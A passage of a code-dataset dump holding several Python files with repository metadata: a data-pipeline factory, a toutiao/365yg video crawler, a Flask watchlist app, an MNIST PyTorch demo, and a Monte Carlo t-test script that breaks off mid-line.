self.hierarchical_dimensions),\n _maybe_override(\n non_hierarchical_dimensions, self.non_hierarchical_dimensions\n ),\n _maybe_override(clean_prefix, self.clean_prefix),\n _maybe_override(canonical_prefix, self.canonical_prefix),\n )\n\n if not self._default_canonical_metadata_collector_cls:\n self._default_canonical_metadata_collector_cls = (\n _subclass_full_dimension_data_collector(\n self.hierarchical_dimensions,\n self.non_hierarchical_dimensions,\n self.clean_prefix,\n self.canonical_prefix,\n )\n )\n return self._default_canonical_metadata_collector_cls\n\n # TODO: Implement non-hierarchical dimension metadata collection\n def create_metadata_collector(\n self,\n metadata_filename=None,\n mapped_locations_filename=None,\n mapped_non_hierarchical_filename=None,\n ):\n '''Instantiate a new FullRowDimensionDataCollector instance based on the\n stored CanonicalAndMetadataCollector class. Initialize the instance by\n reading the metadata and mapped locations specified.\n '''\n # pylint: disable=not-callable\n collector = self.CanonicalAndMetadataCollector()\n if metadata_filename:\n with open(metadata_filename) as metadata_file:\n metadata_reader = UnicodeDictReader(metadata_file)\n for row in metadata_reader:\n collector.collect_metadata(row)\n\n if mapped_locations_filename:\n with open(mapped_locations_filename) as mapped_locations_file:\n mapped_locations_reader = UnicodeDictReader(mapped_locations_file)\n for row in mapped_locations_reader:\n collector.collect_hierarchical_canonical_dimensions(row)\n\n if mapped_non_hierarchical_filename:\n with open(mapped_non_hierarchical_filename) as mapped_non_hierarchical_file:\n mapped_non_hierarchical_reader = UnicodeDictReader(\n mapped_non_hierarchical_file\n )\n for row in mapped_non_hierarchical_reader:\n collector.collect_non_hierarchical_canonical_dimensions(row)\n\n return collector\n", "repo_name": "Zenysis/Harmony", "sub_path": "data/pipeline/datatypes/dimension_factory.py", "file_name": "dimension_factory.py", "file_ext": "py", "file_size_in_byte": 8200, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "52", "api": [{"api_name": "data.pipeline.datatypes.dimension_collector.DimensionCollector", "line_number": 13, "usage_type": "name"}, {"api_name": "data.pipeline.datatypes.dimension_cleaner.DimensionCleaner", "line_number": 22, "usage_type": "name"}, {"api_name": "data.pipeline.datatypes.full_dimension_data_collector.FullRowDimensionDataCollector", "line_number": 33, "usage_type": "name"}, {"api_name": "util.file.unicode_csv.UnicodeDictReader", "line_number": 180, "usage_type": "call"}, {"api_name": "util.file.unicode_csv.UnicodeDictReader", "line_number": 186, "usage_type": "call"}, {"api_name": "util.file.unicode_csv.UnicodeDictReader", "line_number": 192, "usage_type": "call"}]} +{"seq_id": "3063884384", "text": "import base64\nimport binascii\nimport json\nimport logging\nimport os\nimport queue\nimport random\nimport re\nimport sys\nimport threading\nimport time\nfrom urllib.parse import urlparse\n\nimport requests\nfrom utils import get_ua, get_proxy, sleep_random\n\n# Numbers of downloading threads concurrently\nTHREADS = 5\n\n# Retry times\nRETRY = 5\n\nFORMAT = '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'\nLOG_FILENAME = 'toutiao.log'\nlogging.basicConfig(\n filename=LOG_FILENAME,\n format=FORMAT,\n level=logging.INFO\n)\n\n\nclass DownloadWorker(threading.Thread):\n def __init__(self, queue, proxies=None):\n super().__init__()\n self.queue = queue\n self.headers = {'User-Agent': get_ua()}\n self.proxies = proxies\n\n def run(self):\n while True:\n title, video_page_url, target_folder = self.queue.get()\n self.download(title, video_page_url, target_folder)\n self.queue.task_done()\n sleep_random(1, 3)\n\n def download(self, title, video_page_url, target_folder):\n vid = self.get_video_vid(video_page_url)\n signed_video_url = self.sign_video_url(vid)\n video_url = self.get_real_video_url(signed_video_url)\n self._download(video_url, title, target_folder)\n\n def _download(self, video_url, title, target_folder):\n video_name = title + '.mp4'\n file_path = os.path.join(target_folder, video_name)\n if not os.path.isfile(file_path):\n print(f\"Downloading {video_name} from {video_url}.\\n\")\n retry_times = 0\n while retry_times < RETRY:\n try:\n resp = requests.get(video_url, proxies=self.proxies, headers=self.headers)\n if resp.status_code == 403:\n retry_times = RETRY\n print(f\"Access Denied when retrieve {video_url}.\\n\")\n raise Exception(\"Access Denied\")\n with open(file_path, 'wb') as f:\n for chunk in resp.iter_content(chunk_size=1024):\n f.write(chunk)\n break\n except Exception as e:\n logging.exception(f'Down error {e}', exc_info=True)\n finally:\n retry_times += 1\n\n def get_video_vid(self, video_page_url):\n try:\n resp = requests.get(video_page_url, headers=self.headers, proxies=self.proxies)\n return re.search(\".*?videoId: '(?P<vid>.*)'\", resp.text).group('vid')\n except AttributeError:\n print('Unable to parse videoId')\n\n def random_with_n_digits(self, n):\n return random.randint(10 ** (n - 1), (10 ** n) - 1)\n\n def sign_video_url(self, vid):\n r = str(self.random_with_n_digits(16))\n\n url = 'https://ib.365yg.com/video/urls/v/1/toutiao/mp4/{vid}'.format(vid=vid)\n n = urlparse(url).path + '?r=' + r\n b_n = bytes(n, encoding=\"utf-8\")\n s = binascii.crc32(b_n)\n aid = 1364\n ts = int(time.time() * 1000)\n return url + f'?r={r}&s={s}&aid={aid}&vfrom=xgplayer&callback=axiosJsonpCallback1&_={ts}'\n\n def get_real_video_url(self, video_url):\n resp = requests.get(video_url, proxies=self.proxies, headers=self.headers)\n resp_dict = json.loads(resp.text[20:-1])\n b64_url = resp_dict['data']['video_list']['video_1']['main_url']\n return base64.b64decode(b64_url).decode()\n\n\nclass CrawlerScheduler:\n def __init__(self, sites, proxies=None):\n self.sites = sites\n self.proxies = proxies\n self.headers = {'User-Agent': get_ua()}\n self.queue = queue.Queue()\n self.scheduling()\n\n def scheduling(self):\n for i in range(THREADS):\n worker = DownloadWorker(queue=self.queue, proxies=self.proxies)\n worker.daemon = True\n worker.start()\n\n for site in self.sites:\n self.get_video_page_urls(site)\n\n def get_video_page_urls(self, site):\n \"\"\"从视频列表获取每个视频页的url\"\"\"\n self._get_video_page_urls(site)\n self.queue.join()\n print(f\"Finish Downloading All the videos from {site}\")\n\n def _get_video_page_urls(self, site):\n current_folder = os.getcwd()\n target_folder = os.path.join(current_folder, site)\n if not os.path.isdir(target_folder):\n os.mkdir(target_folder)\n\n base_url = 'https://www.365yg.com/c/user/article/?user_id={user_id}&max_behot_time={max_behot_time}' \\\n '&max_repin_time=0&count=20&page_type=0'\n max_behot_time = 0\n while True:\n url = base_url.format(user_id=site, max_behot_time=max_behot_time)\n logging.info(url)\n resp = requests.get(url, headers=self.headers, proxies=self.proxies)\n if resp.status_code == 404:\n print(f'Site {site} does not exist')\n break\n\n resp_json = resp.json()\n video_list = resp_json.get('data')\n for video in video_list:\n title = video.get('title')\n source_url = video.get('source_url')\n media_url = video.get('media_url')\n video_page_url = f'https://www.365yg.com/i{source_url.split(\"/\")[2]}/#mid={media_url[2:-1]}'\n print(video_page_url)\n self.queue.put((title, video_page_url, target_folder))\n sleep_random(1, 3)\n\n if resp_json.get('has_more'):\n max_behot_time = resp_json['next']['max_behot_time']\n else:\n break\n\n\ndef parse_sites(filename):\n with open(filename, 'r') as f:\n raw_sites = f.read().lstrip().rstrip()\n\n raw_sites = raw_sites.replace('\\n', ',') \\\n .replace('\\r', ',') \\\n .replace('\\t', ',') \\\n .replace(' ', ',')\n raw_sites = raw_sites.split(',')\n\n sites = list()\n for site in raw_sites:\n site = site.lstrip().rstrip()\n if site:\n sites.append(site)\n return sites\n\n\ndef usage():\n print(u\"未找到sites.txt文件,请创建.\\n\"\n u\"请在文件中指定Tumblr站点名,并以 逗号/空格/tab/表格鍵/回车符 分割,支持多行.\\n\"\n u\"保存文件并重试.\\n\\n\"\n u\"例子: site1,site2\\n\\n\"\n u\"或者直接使用命令行参数指定站点\\n\"\n u\"例子: python tumblr-photo-video-ripper.py site1,site2\")\n\n\nif __name__ == '__main__':\n cur_dir = os.path.dirname(os.path.realpath(__file__))\n\n filename = os.path.join(cur_dir, \"sites.txt\")\n if os.path.exists(filename):\n sites = parse_sites(filename)\n else:\n usage()\n sys.exit(1)\n\n CrawlerScheduler(sites)\n", "repo_name": "qiaocco/crawler", "sub_path": "toutiao_video/crawler.py", "file_name": "crawler.py", "file_ext": "py", "file_size_in_byte": 6732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 32, "usage_type": "attribute"}, {"api_name": "utils.get_ua", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.sleep_random", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 70, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 76, "usage_type": "call"}, {"api_name": "re.search", "line_number": 77, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 82, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 88, "usage_type": "call"}, {"api_name": "binascii.crc32", "line_number": 90, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 96, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 97, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 99, "usage_type": "call"}, {"api_name": "utils.get_ua", "line_number": 106, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 107, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 136, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 137, "usage_type": "call"}, {"api_name": "utils.sleep_random", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path", "line_number": 187, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 189, "usage_type": "call"}, {"api_name": "os.path", "line_number": 189, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 190, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 194, "usage_type": "call"}]} +{"seq_id": "7247076404", "text": "import os\nimport sys\nimport click\n\nfrom flask import render_template, request, url_for, flash, redirect\nfrom flask_login import login_user, login_required, logout_user, current_user\n\nfrom watchlist import app, db\nfrom watchlist.models import User, Movies\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n # 获取表单数据\n if request.method == 'POST':\n if not current_user.is_authenticated: # 如果当前用户未认证\n return redirect(url_for('index'))\n\n title = request.form.get('title') # 传入表单对应输入字段的name值\n year = request.form.get('year')\n # 验证数据\n if not title or not year or len(year) != 4 or len(title) > 60:\n flash('Invalid Input!') # 显示错误信息\n return redirect(url_for('index')) # 重定向回主页\n\n movie = Movies.query.all()\n for m in movie: # 判断是否已经存在\n if m.title == title:\n flash('Already Exits!') # 显示错误信息\n return redirect(url_for('index')) # 重定向回主页\n\n # 保存表单数据到数据库\n movie = Movies(title=title, year=year)\n db.session.add(movie) # 添加到数据库会话\n db.session.commit() # 提交到数据库\n flash('Item Created!')\n return redirect(url_for('index'))\n\n # movies = Movies.query.all() # 从数据库读取\n page = int(request.args.get('page', 1)) # 当前页数\n per_age = int(request.args.get('per_page', 10)) # 每页显示的条数\n paginate = Movies.query.paginate(page, per_age, error_out=False) # error_out:是否打印错误信息\n movies = paginate.items # 返回当前页的所有数据\n\n return render_template('index.html', movies=movies, paginate=paginate)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n\n if not username or not password:\n flash('Invalid Input.')\n return redirect(url_for('login'))\n\n user = User.query.first()\n # 验证用户名和密码是否一致\n if username == user.username and user.validate_password(password):\n login_user(user) # 登入用户\n flash('Login success.')\n return redirect(url_for('index'))\n\n flash('Invalid name or password.') # 验证失败返回错误信息\n return redirect(url_for('login'))\n\n return render_template('login.html')\n\n\n@app.route('/logout')\n@login_required # 用于视图保护\ndef logout():\n logout_user()\n flash('Goodbye.')\n return redirect(url_for('index'))\n\n\n@app.route('/movie/edit/<int:movie_id>', methods=['GET', 'POST'])\n@login_required\ndef edit(movie_id):\n movie = Movies.query.get_or_404(movie_id)\n\n if request.method == 'POST':\n title = request.form.get('title')\n year = request.form.get('year')\n\n if not title or not year or len(year) != 4 or len(title) > 60:\n flash('Invalid Input!')\n return redirect(url_for('edit', movie_id=movie_id))\n\n movie.title = title # 更新标题\n movie.year = year # 更新年份\n db.session.commit()\n flash('Item Created!')\n return redirect(url_for('index'))\n\n return render_template('edit.html', movie=movie) # 传入被编辑的电影记录\n\n\n@app.route('/movie/delete/<int:movie_id>', methods=['GET', 'POST'])\n@login_required\ndef delete(movie_id):\n movie = Movies.query.get_or_404(movie_id) # 获取电影记录\n db.session.delete(movie) # 删除对应的记录\n db.session.commit()\n flash(\"Item Deleted!\")\n return redirect(url_for('index'))\n\n\n@app.route('/settings', methods=['GET', 'POST'])\n@login_required\ndef settings():\n if request.method == 'POST':\n name = request.form['name']\n\n if not name or len(name) > 60:\n flash('Invalid name')\n return redirect(url_for('settings'))\n\n current_user.name = name\n # current_user 会返回当前登录用户的数据库对象,等同于下面的用法\n # user = User.query.first()\n # user.name = name\n db.session.commit()\n flash('Settings success.')\n return redirect(url_for('index'))\n\n return render_template('settings.html')\n", "repo_name": "jiafeng666/watchlist2.0", "sub_path": "watchlist/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4374, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.request.method", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 24, "usage_type": "call"}, {"api_name": "watchlist.models.Movies.query.all", "line_number": 26, "usage_type": "call"}, {"api_name": "watchlist.models.Movies.query", "line_number": 26, "usage_type": "attribute"}, {"api_name": "watchlist.models.Movies", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 30, "usage_type": "call"}, {"api_name": "watchlist.models.Movies", "line_number": 33, "usage_type": "call"}, {"api_name": "watchlist.db.session.add", "line_number": 34, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 34, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 34, "usage_type": "name"}, {"api_name": "watchlist.db.session.commit", "line_number": 35, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 35, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "watchlist.models.Movies.query.paginate", "line_number": 42, "usage_type": "call"}, {"api_name": "watchlist.models.Movies.query", "line_number": 42, "usage_type": "attribute"}, {"api_name": "watchlist.models.Movies", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 12, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 12, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 56, "usage_type": "call"}, {"api_name": "watchlist.models.User.query.first", "line_number": 58, "usage_type": "call"}, {"api_name": "watchlist.models.User.query", "line_number": 58, "usage_type": "attribute"}, {"api_name": "watchlist.models.User", "line_number": 58, "usage_type": "name"}, {"api_name": "flask_login.login_user", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 68, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 48, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 48, "usage_type": "name"}, {"api_name": "flask_login.logout_user", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 76, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 71, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 71, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 72, "usage_type": "name"}, {"api_name": "watchlist.models.Movies.query.get_or_404", "line_number": 82, "usage_type": "call"}, {"api_name": "watchlist.models.Movies.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "watchlist.models.Movies", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 85, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 90, "usage_type": "call"}, {"api_name": "watchlist.db.session.commit", "line_number": 94, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 94, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 94, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 98, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 79, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 79, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 80, "usage_type": "name"}, {"api_name": "watchlist.models.Movies.query.get_or_404", "line_number": 104, "usage_type": "call"}, {"api_name": "watchlist.models.Movies.query", "line_number": 104, "usage_type": "attribute"}, {"api_name": "watchlist.models.Movies", "line_number": 104, "usage_type": "name"}, {"api_name": "watchlist.db.session.delete", "line_number": 105, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 105, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 105, "usage_type": "name"}, {"api_name": "watchlist.db.session.commit", "line_number": 106, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 106, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 106, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 108, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 101, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 101, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 102, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 114, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 115, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 115, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 119, "usage_type": "call"}, {"api_name": "flask_login.current_user.name", "line_number": 121, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 121, "usage_type": "name"}, {"api_name": "watchlist.db.session.commit", "line_number": 125, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 125, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 125, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 129, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 111, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 111, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 112, "usage_type": "name"}]} +{"seq_id": "12861055292", "text": "import torch\nimport torchvision\nfrom torchvision import transforms, datasets\nimport matplotlib.pyplot as plt\nfrom collections import Counter, OrderedDict\n\ntrain = datasets.MNIST(\"\", train=True, download=True, transform=transforms.Compose([transforms.ToTensor()]))\ntest = datasets.MNIST(\"\", train=False, download=True, transform=transforms.Compose([transforms.ToTensor()]))\n\ntrainset = torch.utils.data.DataLoader(train, batch_size=10, shuffle=True)\ntestset = torch.utils.data.DataLoader(train, batch_size=10, shuffle=True)\n\nfor data in trainset:\n print(data)\n break\n\nx, y = data[0][0], data[1][0]\n\nprint(y)\nprint(x.shape)\n\nplt.imshow(x.view(28, 28))\nplt.show()\n\ncounter_list = []\nfor data in trainset:\n _, Y = data\n for y in Y:\n counter_list.append(int(y))\n\ncounter_dict = Counter(counter_list)\ntotal = sum(counter_dict.values())\nprint(OrderedDict(sorted(counter_dict.items())))\n\nfor i in counter_dict:\n print(f\"{i}: {counter_dict[i]/total*100}\")\n", "repo_name": "Roderich25/mac", "sub_path": "pytorch-demo/demo1.py", "file_name": "demo1.py", "file_ext": "py", "file_size_in_byte": 969, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torchvision.datasets.MNIST", "line_number": 7, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 7, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 7, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 7, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 7, "usage_type": "call"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 8, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 8, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 8, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 8, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 11, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 31, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "20421843672", "text": "#The goal of this file is to multithread the distributions before being fed into the t-test function\r\n#imports\r\n#imports\r\nimport math\r\nimport statistics\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport numpy as np\r\nfrom scipy import stats\r\nimport pandas as pd\r\nfrom numba import jit\r\nimport time\r\nimport concurrent.futures\r\n\r\n#checker function for graphing\r\n@jit()\r\ndef GraphDist(stdev, mean):\r\n # 100 linearly spaced numbers\r\n x = np.linspace(-5, 5, 100)\r\n\r\n # build equation\r\n y = (1 / (stdev * (math.sqrt(2 * math.pi)))) * math.pi ** (-.5 * ((x - mean) / stdev) ** 2)\r\n\r\n # setting the axes at the centre\r\n fig = plt.figure()\r\n\r\n # plot the function\r\n plt.plot(x, y, 'r')\r\n\r\n # show the plot\r\n plt.show()\r\n\r\n\r\n@jit()\r\ndef MonteCarlo(stdev, mean, points, rangeVal, bin1):\r\n # generate x vals:\r\n xVals = []\r\n for x in range(points):\r\n a = random.randint(round(rangeVal[0], 0), round(rangeVal[1] - 1, 0)) + random.random()\r\n if abs(round(rangeVal[0], 0)) - abs(rangeVal[0]) != 0:\r\n divider = abs(abs(round(rangeVal[0], 0)) - abs(rangeVal[0]))\r\n add = random.random() * divider\r\n a = a + add\r\n xVals.append(a)\r\n #xVals = np.append(xVals, a)\r\n\r\n # define bins\r\n valsRange = abs(rangeVal[0]) + abs(rangeVal[1])\r\n bins = np.arange(rangeVal[0], rangeVal[1] + valsRange / bin1, valsRange / bin1)\r\n\r\n # fit each x val into bin counter\r\n tally = [0] * (len(bins) - 1)\r\n for x in xVals:\r\n index = 0\r\n for y in range(len(bins) - 1):\r\n if x <= bins[y + 1] and x >= bins[y]:\r\n tally[index] += 1\r\n index += 1\r\n\r\n # get y val for each bin\r\n yVals = []\r\n for x in bins:\r\n y = (1.0 / (stdev * (math.sqrt(2.0 * math.pi)))) * math.pi ** (-.5 * ((x - mean) / stdev) ** 2.0)\r\n yVals.append(y)\r\n\r\n # weighted sum of each bin\r\n weightedSum = []\r\n for x in range(len(tally)):\r\n weightedSum.append(tally[x] * yVals[x])\r\n\r\n return bins, weightedSum\r\n\r\n\r\n@jit()\r\ndef NormalizeDistro(yVals):\r\n totalVal = sum(yVals)\r\n factor = 100 / totalVal\r\n normalizedVals = []\r\n\r\n for y in yVals:\r\n app = y * factor\r\n normalizedVals.append(round(app, 0))\r\n\r\n return normalizedVals\r\n\r\n# convert sampling normal dist into a list of normal distribution - recommended to use un-normalized distribution\r\n@jit()\r\ndef MakeDist(xVals, yVals):\r\n # test space - building t-test distribution\r\n # take the popularity and create list where each xVal is added that many times, relatively creating the normal dist\r\n\r\n intDist = []\r\n #create list of lists\r\n for x in range(len(yVals)):\r\n app = [xVals[x]]*int(round(yVals[x], 0))\r\n intDist.append(app)\r\n\r\n #flatten the list (make it one dimensional)\r\n submitDist = []\r\n for x in intDist:\r\n for y in x:\r\n submitDist.append(y)\r\n\r\n #round the numbers to 2 decimal points for faster computation\r\n for x in range(len(submitDist)):\r\n submitDist[x] = round(submitDist[x], 2)\r\n\r\n return submitDist\r\n\r\n#perform calculation\r\n#@jit()\r\ndef tTest(dist1, dist2):\r\n t_value,p_value = stats.ttest_ind(dist1,dist2)\r\n return t_value, p_value\r\n\r\n\r\n# putting it all together\r\n#@jit()\r\ndef RandomTtest(stdev, mean, points, rangeVal, bins, stdev2, mean2, points2, rangeVal2, bins2):\r\n # generate distributions along curve\r\n # generate distribution 1\r\n xVals, yVals = MonteCarlo(stdev, mean, points, rangeVal, bins)\r\n\r\n # generate distribution 2\r\n xVals2, yVals2 = MonteCarlo(stdev2, mean2, points2, rangeVal2, bins2)\r\n\r\n # multi-threading to flatten dist\r\n # convert into usable histogramic distributions\r\n executor = concurrent.futures.ThreadPoolExecutor(max_workers=2)\r\n future = executor.submit(MakeDist, xVals, yVals)\r\n future1 = executor.submit(MakeDist, 